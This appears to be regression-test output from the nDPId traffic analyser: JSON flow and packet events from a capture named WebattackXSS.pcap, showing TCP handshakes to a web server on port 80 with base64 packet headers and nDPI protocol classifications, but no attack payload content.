+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2078,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":146,"flow_packet_id":1,"flow_last_seen":1499347216659,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347216659,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8zDVAAD4G+ZqsEAABwKgKMtY0AFD0uxclAAAAAKACchCgVAAAAgQFtAQCCAoBOdsQAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2079,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":146,"flow_packet_id":2,"flow_last_seen":1499347216659,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347216659,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1jQ3RTmT9LsXJqAScSB\/8QAAAgQFtAQCCAoD46yGATnbEAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2080,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":146,"flow_packet_id":3,"flow_last_seen":1499347216660,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347216660,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0zDZAAD4G+aGsEAABwKgKMtY0AFD0uxcmN0U5lIAQAOUe+QAAAQEICgE52xAD46yG"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2096,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347219208,"flow_last_seen":1499347219208,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347219208,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54862,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2096,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":147,"flow_packet_id":1,"flow_last_seen":1499347219208,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347219208,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8UEtAAD4GdYWsEAABwKgKMtZOAFD4043GAAAAAKACchAjBAAAAgQFtAQCCAoBOd2NAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2097,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":147,"flow_packet_id":2,"flow_last_seen":1499347219208,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347219208,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1k7LcrrD+NONx6AScSDqxQAAAgQFtAQCCAoD468DATndjQEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2098,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":147,"flow_packet_id":3,"flow_last_seen":1499347219209,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347219209,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0UExAAD4GdYysEAABwKgKMtZOAFD4043Hy3K6xIAQAOWJzQAAAQEICgE53Y0D468D"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2108,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347220447,"flow_last_seen":1499347220447,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347220447,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54876,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2108,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":1,"flow_last_seen":1499347220447,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347220447,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86ABAAD4G3c+sEAABwKgKMtZcAFBnOTbDAAAAAKACchAKXgAAAgQFtAQCCAoBOd7DAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2109,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":2,"flow_last_seen":1499347220447,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347220447,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1lzT7Q76Zzk2xKAScSB0OAAAAgQFtAQCCAoD47A5ATnewwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2110,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":3,"flow_last_seen":1499347220448,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347220448,"pkt":"ABm5CmnxAMGxFOsxCABFAAA06AFAAD4G3dasEAABwKgKMtZcAFBnOTbE0+0O+4AQAOUTQAAAAQEICgE53sMD47A5"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2123,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347221694,"flow_last_seen":1499347221694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347221694,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54890,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2123,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":1,"flow_last_seen":1499347221694,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347221694,"pkt":"ABm5CmnxAMGxFOsxCABFAAA89JJAAD4G0T2sEAABwKgKMtZqAFAcVCtpAAAAAKACchBfVwAAAgQFtAQCCAoBOd\/7AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2124,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":2,"flow_last_seen":1499347221695,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347221695,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1mpdkOZGHFQraqAScSBnCgAAAgQFtAQCCAoD47FxATnf+wEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2125,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":3,"flow_last_seen":1499347221695,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347221695,"pkt":"ABm5CmnxAMGxFOsxCABFAAA09JNAAD4G0USsEAABwKgKMtZqAFAcVCtqXZDmR4AQAOUGEgAAAQEICgE53\/sD47Fx"} 
+00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":310,"flow_first_seen":1499347033203,"flow_last_seen":1499347101320,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232677,"flow_avg_l4_payload_len":750,"midstream":0,"thread_ts_msec":1499347221700,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52910,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347087256,"flow_last_seen":1499347092638,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347221700,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53476,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347087256,"flow_last_seen":1499347092638,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347221700,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53476,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347088552,"flow_last_seen":1499347093638,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347221700,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53490,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347088552,"flow_last_seen":1499347093638,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347221700,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53490,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347091102,"flow_last_seen":1499347096639,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347221700,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53516,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347091102,"flow_last_seen":1499347096639,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347221700,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53516,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347092374,"flow_last_seen":1499347097640,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347221700,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53530,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347092374,"flow_last_seen":1499347097640,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347221700,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53530,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347093662,"flow_last_seen":1499347099640,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347221700,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53544,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347093662,"flow_last_seen":1499347099640,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347221700,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53544,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347096201,"flow_last_seen":1499347101640,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347221700,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53570,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347096201,"flow_last_seen":1499347101640,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347221700,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53570,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2138,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347224338,"flow_last_seen":1499347224338,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347224338,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54916,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2138,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":150,"flow_packet_id":1,"flow_last_seen":1499347224338,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347224338,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8K5xAAD4GmjSsEAABwKgKMtaEAFDFiskTAAAAAKACchAVyAAAAgQFtAQCCAoBOeKPAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2139,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":150,"flow_packet_id":2,"flow_last_seen":1499347224338,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347224338,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1oTh1R3txYrJFKAScSBe+gAAAgQFtAQCCAoD47QGATnijwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2140,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":150,"flow_packet_id":3,"flow_last_seen":1499347224339,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347224339,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0K51AAD4GmjusEAABwKgKMtaEAFDFiskU4dUd7oAQAOX+AAAAAQEICgE54pAD47QG"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2150,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347225590,"flow_last_seen":1499347225590,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347225590,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54930,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2150,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":151,"flow_packet_id":1,"flow_last_seen":1499347225590,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347225590,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8hTdAAD4GQJmsEAABwKgKMtaSAFC4kmb\/AAAAAKACchCDjQAAAgQFtAQCCAoBOePIAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2151,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":151,"flow_packet_id":2,"flow_last_seen":1499347225590,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347225590,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1pJbUfWYuJJnAKAScSB6XwAAAgQFtAQCCAoD47U\/ATnjyAEDAwc="} 
+00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2152,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":151,"flow_packet_id":3,"flow_last_seen":1499347225591,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347225591,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0hThAAD4GQKCsEAABwKgKMtaSAFC4kmcAW1H1mYAQAOUZZgAAAQEICgE548kD47U\/"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2171,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347228091,"flow_last_seen":1499347228091,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347228091,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54956,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2171,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":152,"flow_packet_id":1,"flow_last_seen":1499347228091,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347228091,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8p6lAAD4GHiesEAABwKgKMtasAFAs20GTAAAAAKACchAyJQAAAgQFtAQCCAoBOeY6AAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2172,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":152,"flow_packet_id":2,"flow_last_seen":1499347228091,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347228091,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1qzT8idALNtBlKAScSB8PQAAAgQFtAQCCAoD47ewATnmOgEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2173,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":152,"flow_packet_id":3,"flow_last_seen":1499347228092,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347228092,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0p6pAAD4GHi6sEAABwKgKMtasAFAs20GU0\/InQYAQAOUbRQAAAQEICgE55joD47ew"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2180,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347229416,"flow_last_seen":1499347229416,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347229416,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54970,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2180,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":1,"flow_last_seen":1499347229416,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347229416,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8aTtAAD4GXJWsEAABwKgKMta6AFA5aI6+AAAAAKACchDXEwAAAgQFtAQCCAoBOeeFAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2181,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":2,"flow_last_seen":1499347229417,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347229417,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1rr5YE9wOWiOv6AScSDSQgAAAgQFtAQCCAoD47j7ATnnhQEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2182,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":3,"flow_last_seen":1499347229417,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347229417,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0aTxAAD4GXJysEAABwKgKMta6AFA5aI6\/+WBPcYAQAOVxSgAAAQEICgE554UD47j7"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2195,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347230690,"flow_last_seen":1499347230690,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347230690,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54984,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2195,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":154,"flow_packet_id":1,"flow_last_seen":1499347230690,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347230690,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8uy1AAD4GCqOsEAABwKgKMtbIAFCbKFPuAAAAAKACchCu1wAAAgQFtAQCCAoBOejDAAAAAAEDAwc="} 